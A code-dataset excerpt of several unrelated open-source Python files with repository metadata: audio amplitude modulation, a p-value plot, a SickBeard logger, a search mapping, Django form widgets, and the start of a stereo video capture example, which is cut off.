# Play a wave file with amplitude modulation. # Assumes wave file is mono. # This implementation reads and plays a one frame (sample) at a time (no blocking) """ Read a signal from a wave file, do amplitude modulation, play to output Original: pyrecplay_modulation.py by Gerald Schuller, Octtober 2013 Modified to read a wave file - Ivan Selesnick, September 2015 """ # f0 = 0 # Normal audio f0 = 400 # 'Duck' audio import pyaudio import struct import wave import math # Open wave file (mono) input_wavefile = 'author.wav' # input_wavefile = 'sin01_mono.wav' # input_wavefile = 'sin01_stereo.wav' wf = wave.open( input_wavefile, 'rb') RATE = wf.getframerate() WIDTH = wf.getsampwidth() LEN = wf.getnframes() CHANNELS = wf.getnchannels() print 'The sampling rate is {0:d} samples per second'.format(RATE) print 'Each sample is {0:d} bytes'.format(WIDTH) print 'The signal is {0:d} samples long'.format(LEN) print 'The signal has {0:d} channel(s)'.format(CHANNELS) # Open audio stream p = pyaudio.PyAudio() stream = p.open(format = p.get_format_from_width(WIDTH), channels = 1, rate = RATE, input = False, output = True) print('* Playing...') # Loop through wave file for n in range(0, LEN): # Get sample from wave file input_string = wf.readframes(1) # Convert binary string to tuple of numbers input_tuple = struct.unpack('h', input_string) # (h: two bytes per sample (WIDTH = 2)) # Use first value (of two if stereo) input_value = input_tuple[0] # Amplitude modulation (f0 Hz cosine) output_value = input_value * math.cos(2*math.pi*f0*n/RATE) # Convert value to binary string output_string = struct.pack('h', output_value) # Write binary string to audio output stream stream.write(output_string) print('* Done') stream.stop_stream() stream.close() p.terminate()
mit
-6,821,632,004,709,263,000
26.695652
82
0.6719
false
3.255537
false
false
false
mattpitkin/GraWIToNStatisticsLectures
figures/scripts/pvalue.py
1
1242
#!/usr/bin/env python """ Make plots showing how to calculate the p-value """ import matplotlib.pyplot as pl from scipy.stats import norm from scipy.special import erf import numpy as np mu = 0. # the mean, mu sigma = 1. # standard deviation x = np.linspace(-4, 4, 1000) # x # set plot to render labels using latex pl.rc('text', usetex=True) pl.rc('font', family='serif') pl.rc('font', size=14) fig = pl.figure(figsize=(7,4), dpi=100) # value of x for calculating p-value Z = 1.233 y = norm.pdf(x, mu, sigma) # plot pdfs pl.plot(x, y, 'r') pl.plot([-Z, -Z], [0., np.max(y)], 'k--') pl.plot([Z, Z], [0., np.max(y)], 'k--') pl.fill_between(x, np.zeros(len(x)), y, where=x<=-Z, facecolor='green', interpolate=True, alpha=0.6) pl.fill_between(x, np.zeros(len(x)), y, where=x>=Z, facecolor='green', interpolate=True, alpha=0.6) pvalue = 1.-erf(Z/np.sqrt(2.)) ax = pl.gca() ax.set_xlabel('$Z$', fontsize=14) ax.set_ylabel('$p(Z)$', fontsize=14) ax.set_xlim(-4, 4) ax.grid(True) ax.text(Z+0.1, 0.3, '$Z_{\\textrm{obs}} = 1.233$', fontsize=16) ax.text(-3.6, 0.31, '$p$-value$= %.2f$' % pvalue, fontsize=18, bbox={'facecolor': 'none', 'pad':12, 'ec': 'r'}) fig.subplots_adjust(bottom=0.15) pl.savefig('../pvalue.pdf') pl.show()
mit
2,189,113,514,410,378,800
22.884615
100
0.625604
false
2.425781
false
false
false
mozvip/Sick-Beard
sickbeard/logger.py
1
6374
# Author: Nic Wolfe <nic@wolfeden.ca> # URL: http://code.google.com/p/sickbeard/ # # This file is part of Sick Beard. # # Sick Beard is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Sick Beard is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Sick Beard. If not, see <http://www.gnu.org/licenses/>. from __future__ import with_statement import os import threading import logging import sickbeard from sickbeard import classes # number of log files to keep NUM_LOGS = 3 # log size in bytes LOG_SIZE = 10000000 # 10 megs ERROR = logging.ERROR WARNING = logging.WARNING MESSAGE = logging.INFO DEBUG = logging.DEBUG reverseNames = {u'ERROR': ERROR, u'WARNING': WARNING, u'INFO': MESSAGE, u'DEBUG': DEBUG} class SBRotatingLogHandler(object): def __init__(self, log_file, num_files, num_bytes): self.num_files = num_files self.num_bytes = num_bytes self.log_file = log_file self.cur_handler = None self.writes_since_check = 0 self.log_lock = threading.Lock() def initLogging(self, consoleLogging=True): self.log_file = os.path.join(sickbeard.LOG_DIR, self.log_file) self.cur_handler = self._config_handler() logging.getLogger('sickbeard').addHandler(self.cur_handler) logging.getLogger('subliminal').addHandler(self.cur_handler) # define a Handler which writes INFO messages or higher to the sys.stderr if consoleLogging: console = logging.StreamHandler() console.setLevel(logging.INFO) # set a format which is simpler for console use console.setFormatter(logging.Formatter('%(asctime)s %(levelname)s::%(message)s', '%H:%M:%S')) # add the handler to the root logger logging.getLogger('sickbeard').addHandler(console) logging.getLogger('subliminal').addHandler(console) logging.getLogger('sickbeard').setLevel(logging.DEBUG) logging.getLogger('subliminal').setLevel(logging.ERROR) def _config_handler(self): """ Configure a file handler to log at file_name and return it. """ file_handler = logging.FileHandler(self.log_file) file_handler.setLevel(logging.DEBUG) file_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)-8s %(message)s', '%b-%d %H:%M:%S')) return file_handler def _log_file_name(self, i): """ Returns a numbered log file name depending on i. If i==0 it just uses logName, if not it appends it to the extension (blah.log.3 for i == 3) i: Log number to ues """ return self.log_file + ('.' + str(i) if i else '') def _num_logs(self): """ Scans the log folder and figures out how many log files there are already on disk Returns: The number of the last used file (eg. mylog.log.3 would return 3). If there are no logs it returns -1 """ cur_log = 0 while os.path.isfile(self._log_file_name(cur_log)): cur_log += 1 return cur_log - 1 def _rotate_logs(self): sb_logger = logging.getLogger('sickbeard') subli_logger = logging.getLogger('subliminal') # delete the old handler if self.cur_handler: self.cur_handler.flush() self.cur_handler.close() sb_logger.removeHandler(self.cur_handler) subli_logger.removeHandler(self.cur_handler) # rename or delete all the old log files for i in range(self._num_logs(), -1, -1): cur_file_name = self._log_file_name(i) try: if i >= NUM_LOGS: os.remove(cur_file_name) else: os.rename(cur_file_name, self._log_file_name(i+1)) except WindowsError: pass # the new log handler will always be on the un-numbered .log file new_file_handler = self._config_handler() self.cur_handler = new_file_handler sb_logger.addHandler(new_file_handler) subli_logger.addHandler(new_file_handler) def log(self, toLog, logLevel=MESSAGE): with self.log_lock: # check the size and see if we need to rotate if self.writes_since_check >= 10: if os.path.isfile(self.log_file) and os.path.getsize(self.log_file) >= LOG_SIZE: self._rotate_logs() self.writes_since_check = 0 else: self.writes_since_check += 1 meThread = threading.currentThread().getName() message = meThread + u" :: " + toLog out_line = message.encode('utf-8') sb_logger = logging.getLogger('sickbeard') try: if logLevel == DEBUG: sb_logger.debug(out_line) elif logLevel == MESSAGE: sb_logger.info(out_line) elif logLevel == WARNING: sb_logger.warning(out_line) elif logLevel == ERROR: sb_logger.error(out_line) # add errors to the UI logger classes.ErrorViewer.add(classes.UIError(message)) else: sb_logger.log(logLevel, out_line) except ValueError: pass sb_log_instance = SBRotatingLogHandler('sickbeard.log', NUM_LOGS, LOG_SIZE) def log(toLog, logLevel=MESSAGE): sb_log_instance.log(toLog, logLevel)
gpl-3.0
-7,407,349,847,844,336,000
32.464865
118
0.568089
false
4.067645
false
false
false
c2corg/v6_api
c2corg_api/search/mappings/image_mapping.py
1
1144
from c2corg_api.models.image import IMAGE_TYPE, Image from c2corg_api.search.mapping import SearchDocument, BaseMeta from c2corg_api.search.mapping_types import QueryableMixin, QEnumArray, \ QInteger, QDate class SearchImage(SearchDocument): class Meta(BaseMeta): doc_type = IMAGE_TYPE activities = QEnumArray( 'act', model_field=Image.activities) categories = QEnumArray( 'cat', model_field=Image.categories) image_type = QEnumArray( 'ityp', model_field=Image.image_type) elevation = QInteger( 'ialt', range=True) date_time = QDate('idate', 'date_time') FIELDS = [ 'activities', 'categories', 'image_type', 'elevation', 'date_time' ] @staticmethod def to_search_document(document, index): search_document = SearchDocument.to_search_document(document, index) if document.redirects_to: return search_document SearchDocument.copy_fields( search_document, document, SearchImage.FIELDS) return search_document SearchImage.queryable_fields = QueryableMixin.get_queryable_fields(SearchImage)
agpl-3.0
6,425,518,314,371,161,000
29.105263
79
0.681818
false
3.726384
false
false
false
ar4s/django
django/forms/widgets.py
1
32506
""" HTML Widget classes """ from __future__ import unicode_literals import copy from itertools import chain import warnings from django.conf import settings from django.forms.utils import flatatt, to_current_timezone from django.utils.datastructures import MultiValueDict, MergeDict from django.utils.html import conditional_escape, format_html from django.utils.translation import ugettext_lazy from django.utils.encoding import force_text, python_2_unicode_compatible from django.utils.safestring import mark_safe from django.utils import datetime_safe, formats, six from django.utils.six.moves.urllib.parse import urljoin __all__ = ( 'Media', 'MediaDefiningClass', 'Widget', 'TextInput', 'EmailInput', 'URLInput', 'NumberInput', 'PasswordInput', 'HiddenInput', 'MultipleHiddenInput', 'ClearableFileInput', 'FileInput', 'DateInput', 'DateTimeInput', 'TimeInput', 'Textarea', 'CheckboxInput', 'Select', 'NullBooleanSelect', 'SelectMultiple', 'RadioSelect', 'CheckboxSelectMultiple', 'MultiWidget', 'SplitDateTimeWidget', 'SplitHiddenDateTimeWidget', ) MEDIA_TYPES = ('css','js') @python_2_unicode_compatible class Media(object): def __init__(self, media=None, **kwargs): if media: media_attrs = media.__dict__ else: media_attrs = kwargs self._css = {} self._js = [] for name in MEDIA_TYPES: getattr(self, 'add_' + name)(media_attrs.get(name, None)) # Any leftover attributes must be invalid. # if media_attrs != {}: # raise TypeError("'class Media' has invalid attribute(s): %s" % ','.join(media_attrs.keys())) def __str__(self): return self.render() def render(self): return mark_safe('\n'.join(chain(*[getattr(self, 'render_' + name)() for name in MEDIA_TYPES]))) def render_js(self): return [format_html('<script type="text/javascript" src="{0}"></script>', self.absolute_path(path)) for path in self._js] def render_css(self): # To keep rendering order consistent, we can't just iterate over items(). # We need to sort the keys, and iterate over the sorted list. media = sorted(self._css.keys()) return chain(*[ [format_html('<link href="{0}" type="text/css" media="{1}" rel="stylesheet" />', self.absolute_path(path), medium) for path in self._css[medium]] for medium in media]) def absolute_path(self, path, prefix=None): if path.startswith(('http://', 'https://', '/')): return path if prefix is None: if settings.STATIC_URL is None: # backwards compatibility prefix = settings.MEDIA_URL else: prefix = settings.STATIC_URL return urljoin(prefix, path) def __getitem__(self, name): "Returns a Media object that only contains media of the given type" if name in MEDIA_TYPES: return Media(**{str(name): getattr(self, '_' + name)}) raise KeyError('Unknown media type "%s"' % name) def add_js(self, data): if data: for path in data: if path not in self._js: self._js.append(path) def add_css(self, data): if data: for medium, paths in data.items(): for path in paths: if not self._css.get(medium) or path not in self._css[medium]: self._css.setdefault(medium, []).append(path) def __add__(self, other): combined = Media() for name in MEDIA_TYPES: getattr(combined, 'add_' + name)(getattr(self, '_' + name, None)) getattr(combined, 'add_' + name)(getattr(other, '_' + name, None)) return combined def media_property(cls): def _media(self): # Get the media property of the superclass, if it exists sup_cls = super(cls, self) try: base = sup_cls.media except AttributeError: base = Media() # Get the media definition for this class definition = getattr(cls, 'Media', None) if definition: extend = getattr(definition, 'extend', True) if extend: if extend == True: m = base else: m = Media() for medium in extend: m = m + base[medium] return m + Media(definition) else: return Media(definition) else: return base return property(_media) class MediaDefiningClass(type): "Metaclass for classes that can have media definitions" def __new__(cls, name, bases, attrs): new_class = super(MediaDefiningClass, cls).__new__(cls, name, bases, attrs) if 'media' not in attrs: new_class.media = media_property(new_class) return new_class @python_2_unicode_compatible class SubWidget(object): """ Some widgets are made of multiple HTML elements -- namely, RadioSelect. This is a class that represents the "inner" HTML element of a widget. """ def __init__(self, parent_widget, name, value, attrs, choices): self.parent_widget = parent_widget self.name, self.value = name, value self.attrs, self.choices = attrs, choices def __str__(self): args = [self.name, self.value, self.attrs] if self.choices: args.append(self.choices) return self.parent_widget.render(*args) class Widget(six.with_metaclass(MediaDefiningClass)): is_hidden = False # Determines whether this corresponds to an <input type="hidden">. needs_multipart_form = False # Determines does this widget need multipart form is_localized = False is_required = False def __init__(self, attrs=None): if attrs is not None: self.attrs = attrs.copy() else: self.attrs = {} def __deepcopy__(self, memo): obj = copy.copy(self) obj.attrs = self.attrs.copy() memo[id(self)] = obj return obj def subwidgets(self, name, value, attrs=None, choices=()): """ Yields all "subwidgets" of this widget. Used only by RadioSelect to allow template access to individual <input type="radio"> buttons. Arguments are the same as for render(). """ yield SubWidget(self, name, value, attrs, choices) def render(self, name, value, attrs=None): """ Returns this Widget rendered as HTML, as a Unicode string. The 'value' given is not guaranteed to be valid input, so subclass implementations should program defensively. """ raise NotImplementedError('subclasses of Widget must provide a render() method') def build_attrs(self, extra_attrs=None, **kwargs): "Helper function for building an attribute dictionary." attrs = dict(self.attrs, **kwargs) if extra_attrs: attrs.update(extra_attrs) return attrs def value_from_datadict(self, data, files, name): """ Given a dictionary of data and this widget's name, returns the value of this widget. Returns None if it's not provided. """ return data.get(name, None) def id_for_label(self, id_): """ Returns the HTML ID attribute of this Widget for use by a <label>, given the ID of the field. Returns None if no ID is available. This hook is necessary because some widgets have multiple HTML elements and, thus, multiple IDs. In that case, this method should return an ID value that corresponds to the first ID in the widget's tags. """ return id_ class Input(Widget): """ Base class for all <input> widgets (except type='checkbox' and type='radio', which are special). """ input_type = None # Subclasses must define this. def _format_value(self, value): if self.is_localized: return formats.localize_input(value) return value def render(self, name, value, attrs=None): if value is None: value = '' final_attrs = self.build_attrs(attrs, type=self.input_type, name=name) if value != '': # Only add the 'value' attribute if a value is non-empty. final_attrs['value'] = force_text(self._format_value(value)) return format_html('<input{0} />', flatatt(final_attrs)) class TextInput(Input): input_type = 'text' def __init__(self, attrs=None): if attrs is not None: self.input_type = attrs.pop('type', self.input_type) super(TextInput, self).__init__(attrs) class NumberInput(TextInput): input_type = 'number' class EmailInput(TextInput): input_type = 'email' class URLInput(TextInput): input_type = 'url' class PasswordInput(TextInput): input_type = 'password' def __init__(self, attrs=None, render_value=False): super(PasswordInput, self).__init__(attrs) self.render_value = render_value def render(self, name, value, attrs=None): if not self.render_value: value=None return super(PasswordInput, self).render(name, value, attrs) class HiddenInput(Input): input_type = 'hidden' is_hidden = True class MultipleHiddenInput(HiddenInput): """ A widget that handles <input type="hidden"> for fields that have a list of values. """ def __init__(self, attrs=None, choices=()): super(MultipleHiddenInput, self).__init__(attrs) # choices can be any iterable self.choices = choices def render(self, name, value, attrs=None, choices=()): if value is None: value = [] final_attrs = self.build_attrs(attrs, type=self.input_type, name=name) id_ = final_attrs.get('id', None) inputs = [] for i, v in enumerate(value): input_attrs = dict(value=force_text(v), **final_attrs) if id_: # An ID attribute was given. Add a numeric index as a suffix # so that the inputs don't all have the same ID attribute. input_attrs['id'] = '%s_%s' % (id_, i) inputs.append(format_html('<input{0} />', flatatt(input_attrs))) return mark_safe('\n'.join(inputs)) def value_from_datadict(self, data, files, name): if isinstance(data, (MultiValueDict, MergeDict)): return data.getlist(name) return data.get(name, None) class FileInput(Input): input_type = 'file' needs_multipart_form = True def render(self, name, value, attrs=None): return super(FileInput, self).render(name, None, attrs=attrs) def value_from_datadict(self, data, files, name): "File widgets take data from FILES, not POST" return files.get(name, None) FILE_INPUT_CONTRADICTION = object() class ClearableFileInput(FileInput): initial_text = ugettext_lazy('Currently') input_text = ugettext_lazy('Change') clear_checkbox_label = ugettext_lazy('Clear') template_with_initial = '%(initial_text)s: %(initial)s %(clear_template)s<br />%(input_text)s: %(input)s' template_with_clear = '%(clear)s <label for="%(clear_checkbox_id)s">%(clear_checkbox_label)s</label>' url_markup_template = '<a href="{0}">{1}</a>' def clear_checkbox_name(self, name): """ Given the name of the file input, return the name of the clear checkbox input. """ return name + '-clear' def clear_checkbox_id(self, name): """ Given the name of the clear checkbox input, return the HTML id for it. """ return name + '_id' def render(self, name, value, attrs=None): substitutions = { 'initial_text': self.initial_text, 'input_text': self.input_text, 'clear_template': '', 'clear_checkbox_label': self.clear_checkbox_label, } template = '%(input)s' substitutions['input'] = super(ClearableFileInput, self).render(name, value, attrs) if value and hasattr(value, "url"): template = self.template_with_initial substitutions['initial'] = format_html(self.url_markup_template, value.url, force_text(value)) if not self.is_required: checkbox_name = self.clear_checkbox_name(name) checkbox_id = self.clear_checkbox_id(checkbox_name) substitutions['clear_checkbox_name'] = conditional_escape(checkbox_name) substitutions['clear_checkbox_id'] = conditional_escape(checkbox_id) substitutions['clear'] = CheckboxInput().render(checkbox_name, False, attrs={'id': checkbox_id}) substitutions['clear_template'] = self.template_with_clear % substitutions return mark_safe(template % substitutions) def value_from_datadict(self, data, files, name): upload = super(ClearableFileInput, self).value_from_datadict(data, files, name) if not self.is_required and CheckboxInput().value_from_datadict( data, files, self.clear_checkbox_name(name)): if upload: # If the user contradicts themselves (uploads a new file AND # checks the "clear" checkbox), we return a unique marker # object that FileField will turn into a ValidationError. return FILE_INPUT_CONTRADICTION # False signals to clear any existing value, as opposed to just None return False return upload class Textarea(Widget): def __init__(self, attrs=None): # The 'rows' and 'cols' attributes are required for HTML correctness. default_attrs = {'cols': '40', 'rows': '10'} if attrs: default_attrs.update(attrs) super(Textarea, self).__init__(default_attrs) def render(self, name, value, attrs=None): if value is None: value = '' final_attrs = self.build_attrs(attrs, name=name) return format_html('<textarea{0}>\r\n{1}</textarea>', flatatt(final_attrs), force_text(value)) class DateInput(TextInput): def __init__(self, attrs=None, format=None): super(DateInput, self).__init__(attrs) if format: self.format = format self.manual_format = True else: self.format = formats.get_format('DATE_INPUT_FORMATS')[0] self.manual_format = False def _format_value(self, value): if self.is_localized and not self.manual_format: return formats.localize_input(value) elif hasattr(value, 'strftime'): value = datetime_safe.new_date(value) return value.strftime(self.format) return value class DateTimeInput(TextInput): def __init__(self, attrs=None, format=None): super(DateTimeInput, self).__init__(attrs) if format: self.format = format self.manual_format = True else: self.format = formats.get_format('DATETIME_INPUT_FORMATS')[0] self.manual_format = False def _format_value(self, value): if self.is_localized and not self.manual_format: return formats.localize_input(value) elif hasattr(value, 'strftime'): value = datetime_safe.new_datetime(value) return value.strftime(self.format) return value class TimeInput(TextInput): def __init__(self, attrs=None, format=None): super(TimeInput, self).__init__(attrs) if format: self.format = format self.manual_format = True else: self.format = formats.get_format('TIME_INPUT_FORMATS')[0] self.manual_format = False def _format_value(self, value): if self.is_localized and not self.manual_format: return formats.localize_input(value) elif hasattr(value, 'strftime'): return value.strftime(self.format) return value # Defined at module level so that CheckboxInput is picklable (#17976) def boolean_check(v): return not (v is False or v is None or v == '') class CheckboxInput(Widget): def __init__(self, attrs=None, check_test=None): super(CheckboxInput, self).__init__(attrs) # check_test is a callable that takes a value and returns True # if the checkbox should be checked for that value. self.check_test = boolean_check if check_test is None else check_test def render(self, name, value, attrs=None): final_attrs = self.build_attrs(attrs, type='checkbox', name=name) if self.check_test(value): final_attrs['checked'] = 'checked' if not (value is True or value is False or value is None or value == ''): # Only add the 'value' attribute if a value is non-empty. final_attrs['value'] = force_text(value) return format_html('<input{0} />', flatatt(final_attrs)) def value_from_datadict(self, data, files, name): if name not in data: # A missing value means False because HTML form submission does not # send results for unselected checkboxes. return False value = data.get(name) # Translate true and false strings to boolean values. values = {'true': True, 'false': False} if isinstance(value, six.string_types): value = values.get(value.lower(), value) return bool(value) class Select(Widget): allow_multiple_selected = False def __init__(self, attrs=None, choices=()): super(Select, self).__init__(attrs) # choices can be any iterable, but we may need to render this widget # multiple times. Thus, collapse it into a list so it can be consumed # more than once. self.choices = list(choices) def render(self, name, value, attrs=None, choices=()): if value is None: value = '' final_attrs = self.build_attrs(attrs, name=name) output = [format_html('<select{0}>', flatatt(final_attrs))] options = self.render_options(choices, [value]) if options: output.append(options) output.append('</select>') return mark_safe('\n'.join(output)) def render_option(self, selected_choices, option_value, option_label): if option_value == None: option_value = '' option_value = force_text(option_value) if option_value in selected_choices: selected_html = mark_safe(' selected="selected"') if not self.allow_multiple_selected: # Only allow for a single selection. selected_choices.remove(option_value) else: selected_html = '' return format_html('<option value="{0}"{1}>{2}</option>', option_value, selected_html, force_text(option_label)) def render_options(self, choices, selected_choices): # Normalize to strings. selected_choices = set(force_text(v) for v in selected_choices) output = [] for option_value, option_label in chain(self.choices, choices): if isinstance(option_label, (list, tuple)): output.append(format_html('<optgroup label="{0}">', force_text(option_value))) for option in option_label: output.append(self.render_option(selected_choices, *option)) output.append('</optgroup>') else: output.append(self.render_option(selected_choices, option_value, option_label)) return '\n'.join(output) class NullBooleanSelect(Select): """ A Select Widget intended to be used with NullBooleanField. """ def __init__(self, attrs=None): choices = (('1', ugettext_lazy('Unknown')), ('2', ugettext_lazy('Yes')), ('3', ugettext_lazy('No'))) super(NullBooleanSelect, self).__init__(attrs, choices) def render(self, name, value, attrs=None, choices=()): try: value = {True: '2', False: '3', '2': '2', '3': '3'}[value] except KeyError: value = '1' return super(NullBooleanSelect, self).render(name, value, attrs, choices) def value_from_datadict(self, data, files, name): value = data.get(name, None) return {'2': True, True: True, 'True': True, '3': False, 'False': False, False: False}.get(value, None) class SelectMultiple(Select): allow_multiple_selected = True def render(self, name, value, attrs=None, choices=()): if value is None: value = [] final_attrs = self.build_attrs(attrs, name=name) output = [format_html('<select multiple="multiple"{0}>', flatatt(final_attrs))] options = self.render_options(choices, value) if options: output.append(options) output.append('</select>') return mark_safe('\n'.join(output)) def value_from_datadict(self, data, files, name): if isinstance(data, (MultiValueDict, MergeDict)): return data.getlist(name) return data.get(name, None) @python_2_unicode_compatible class ChoiceInput(SubWidget): """ An object used by ChoiceFieldRenderer that represents a single <input type='$input_type'>. """ input_type = None # Subclasses must define this def __init__(self, name, value, attrs, choice, index): self.name = name self.value = value self.attrs = attrs self.choice_value = force_text(choice[0]) self.choice_label = force_text(choice[1]) self.index = index if 'id' in self.attrs: self.attrs['id'] += "_%d" % self.index def __str__(self): return self.render() def render(self, name=None, value=None, attrs=None, choices=()): if self.id_for_label: label_for = format_html(' for="{0}"', self.id_for_label) else: label_for = '' return format_html('<label{0}>{1} {2}</label>', label_for, self.tag(), self.choice_label) def is_checked(self): return self.value == self.choice_value def tag(self): final_attrs = dict(self.attrs, type=self.input_type, name=self.name, value=self.choice_value) if self.is_checked(): final_attrs['checked'] = 'checked' return format_html('<input{0} />', flatatt(final_attrs)) @property def id_for_label(self): return self.attrs.get('id', '') class RadioChoiceInput(ChoiceInput): input_type = 'radio' def __init__(self, *args, **kwargs): super(RadioChoiceInput, self).__init__(*args, **kwargs) self.value = force_text(self.value) class RadioInput(RadioChoiceInput): def __init__(self, *args, **kwargs): msg = "RadioInput has been deprecated. Use RadioChoiceInput instead." warnings.warn(msg, DeprecationWarning, stacklevel=2) super(RadioInput, self).__init__(*args, **kwargs) class CheckboxChoiceInput(ChoiceInput): input_type = 'checkbox' def __init__(self, *args, **kwargs): super(CheckboxChoiceInput, self).__init__(*args, **kwargs) self.value = set(force_text(v) for v in self.value) def is_checked(self): return self.choice_value in self.value @python_2_unicode_compatible class ChoiceFieldRenderer(object): """ An object used by RadioSelect to enable customization of radio widgets. """ choice_input_class = None def __init__(self, name, value, attrs, choices): self.name = name self.value = value self.attrs = attrs self.choices = choices def __getitem__(self, idx): choice = self.choices[idx] # Let the IndexError propogate return self.choice_input_class(self.name, self.value, self.attrs.copy(), choice, idx) def __str__(self): return self.render() def render(self): """ Outputs a <ul> for this set of choice fields. If an id was given to the field, it is applied to the <ul> (each item in the list will get an id of `$id_$i`). """ id_ = self.attrs.get('id', None) start_tag = format_html('<ul id="{0}">', id_) if id_ else '<ul>' output = [start_tag] for i, choice in enumerate(self.choices): choice_value, choice_label = choice if isinstance(choice_label, (tuple,list)): attrs_plus = self.attrs.copy() if id_: attrs_plus['id'] += '_{0}'.format(i) sub_ul_renderer = ChoiceFieldRenderer(name=self.name, value=self.value, attrs=attrs_plus, choices=choice_label) sub_ul_renderer.choice_input_class = self.choice_input_class output.append(format_html('<li>{0}{1}</li>', choice_value, sub_ul_renderer.render())) else: w = self.choice_input_class(self.name, self.value, self.attrs.copy(), choice, i) output.append(format_html('<li>{0}</li>', force_text(w))) output.append('</ul>') return mark_safe('\n'.join(output)) class RadioFieldRenderer(ChoiceFieldRenderer): choice_input_class = RadioChoiceInput class CheckboxFieldRenderer(ChoiceFieldRenderer): choice_input_class = CheckboxChoiceInput class RendererMixin(object): renderer = None # subclasses must define this _empty_value = None def __init__(self, *args, **kwargs): # Override the default renderer if we were passed one. renderer = kwargs.pop('renderer', None) if renderer: self.renderer = renderer super(RendererMixin, self).__init__(*args, **kwargs) def subwidgets(self, name, value, attrs=None, choices=()): for widget in self.get_renderer(name, value, attrs, choices): yield widget def get_renderer(self, name, value, attrs=None, choices=()): """Returns an instance of the renderer.""" if value is None: value = self._empty_value final_attrs = self.build_attrs(attrs) choices = list(chain(self.choices, choices)) return self.renderer(name, value, final_attrs, choices) def render(self, name, value, attrs=None, choices=()): return self.get_renderer(name, value, attrs, choices).render() def id_for_label(self, id_): # Widgets using this RendererMixin are made of a collection of # subwidgets, each with their own <label>, and distinct ID. # The IDs are made distinct by y "_X" suffix, where X is the zero-based # index of the choice field. Thus, the label for the main widget should # reference the first subwidget, hence the "_0" suffix. if id_: id_ += '_0' return id_ class RadioSelect(RendererMixin, Select): renderer = RadioFieldRenderer _empty_value = '' class CheckboxSelectMultiple(RendererMixin, SelectMultiple): renderer = CheckboxFieldRenderer _empty_value = [] class MultiWidget(Widget): """ A widget that is composed of multiple widgets. Its render() method is different than other widgets', because it has to figure out how to split a single value for display in multiple widgets. The ``value`` argument can be one of two things: * A list. * A normal value (e.g., a string) that has been "compressed" from a list of values. In the second case -- i.e., if the value is NOT a list -- render() will first "decompress" the value into a list before rendering it. It does so by calling the decompress() method, which MultiWidget subclasses must implement. This method takes a single "compressed" value and returns a list. When render() does its HTML rendering, each value in the list is rendered with the corresponding widget -- the first value is rendered in the first widget, the second value is rendered in the second widget, etc. Subclasses may implement format_output(), which takes the list of rendered widgets and returns a string of HTML that formats them any way you'd like. You'll probably want to use this class with MultiValueField. """ def __init__(self, widgets, attrs=None): self.widgets = [w() if isinstance(w, type) else w for w in widgets] super(MultiWidget, self).__init__(attrs) def render(self, name, value, attrs=None): if self.is_localized: for widget in self.widgets: widget.is_localized = self.is_localized # value is a list of values, each corresponding to a widget # in self.widgets. if not isinstance(value, list): value = self.decompress(value) output = [] final_attrs = self.build_attrs(attrs) id_ = final_attrs.get('id', None) for i, widget in enumerate(self.widgets): try: widget_value = value[i] except IndexError: widget_value = None if id_: final_attrs = dict(final_attrs, id='%s_%s' % (id_, i)) output.append(widget.render(name + '_%s' % i, widget_value, final_attrs)) return mark_safe(self.format_output(output)) def id_for_label(self, id_): # See the comment for RadioSelect.id_for_label() if id_: id_ += '_0' return id_ def value_from_datadict(self, data, files, name): return [widget.value_from_datadict(data, files, name + '_%s' % i) for i, widget in enumerate(self.widgets)] def format_output(self, rendered_widgets): """ Given a list of rendered widgets (as strings), returns a Unicode string representing the HTML for the whole lot. This hook allows you to format the HTML design of the widgets, if needed. """ return ''.join(rendered_widgets) def decompress(self, value): """ Returns a list of decompressed values for the given compressed value. The given value can be assumed to be valid, but not necessarily non-empty. """ raise NotImplementedError('Subclasses must implement this method.') def _get_media(self): "Media for a multiwidget is the combination of all media of the subwidgets" media = Media() for w in self.widgets: media = media + w.media return media media = property(_get_media) def __deepcopy__(self, memo): obj = super(MultiWidget, self).__deepcopy__(memo) obj.widgets = copy.deepcopy(self.widgets) return obj @property def needs_multipart_form(self): return any(w.needs_multipart_form for w in self.widgets) class SplitDateTimeWidget(MultiWidget): """ A Widget that splits datetime input into two <input type="text"> boxes. """ def __init__(self, attrs=None, date_format=None, time_format=None): widgets = (DateInput(attrs=attrs, format=date_format), TimeInput(attrs=attrs, format=time_format)) super(SplitDateTimeWidget, self).__init__(widgets, attrs) def decompress(self, value): if value: value = to_current_timezone(value) return [value.date(), value.time().replace(microsecond=0)] return [None, None] class SplitHiddenDateTimeWidget(SplitDateTimeWidget): """ A Widget that splits datetime input into two <input type="hidden"> inputs. """ is_hidden = True def __init__(self, attrs=None, date_format=None, time_format=None): super(SplitHiddenDateTimeWidget, self).__init__(attrs, date_format, time_format) for widget in self.widgets: widget.input_type = 'hidden' widget.is_hidden = True
bsd-3-clause
-8,474,089,965,727,551,000
35.813137
130
0.596628
false
4.139837
false
false
false
gift-surg/GIFT-Grab
src/tests/blackmagic/stereo_capture.py
1
4325
#!/usr/bin/env python2 # -*- coding: utf-8 -*- """ Example demonstrating how stereo video frames can be captured using a frame grabber card that supports this feature. """ import time import cv2 import numpy as np from pygiftgrab import (IObserver, VideoSourceFactory, ColourSpace, Device, VideoFrame) class StereoFrameSaver(IObserver): """ Simple class that demonstrates how mono and stereo frames, and their respective parameters can be queried and the actual frame data can be saved using the GIFT-Grab stereo API. """ def __init__(self): super(StereoFrameSaver, self).__init__() self.current = 0 def update(self, frame): self.current += 1 # 4 is the number of variations of stereo/mono # calls to the data method, using it here as well to # avoid flooding the user's terminal if self.current <= 4: # display number of stereo frames, should be 2 # for this device print( 'Got {} stereo frames'.format( frame.stereo_count() ) ) # display length of data of each stereo frame, # each stereo frame should consist of same number # of bytes for this device print( 'Stereo data length (bytes):\n' '\tdata_length(): {}\n' '\tdata_length(0): {}\n' '\tdata_length(1): {}\n'.format( frame.data_length(), frame.data_length(0), frame.data_length(1) ) ) frame_shape = (frame.rows(), frame.cols(), 4) # the slicing below, i.e. [:, :, :3], is due to OpenCV's # imwrite expecting BGR data, so we strip out the alpha # channel of each frame when saving it if self.current == 1: # all three calls below save the same frame, # that is the first of the two stereo frames cv2.imwrite( 'mono-frame.data.png', np.reshape(frame.data(), frame_shape)[:, :, :3] ) cv2.imwrite( 'mono-frame.data-False.png', np.reshape(frame.data(False), frame_shape)[:, :, :3] ) cv2.imwrite( 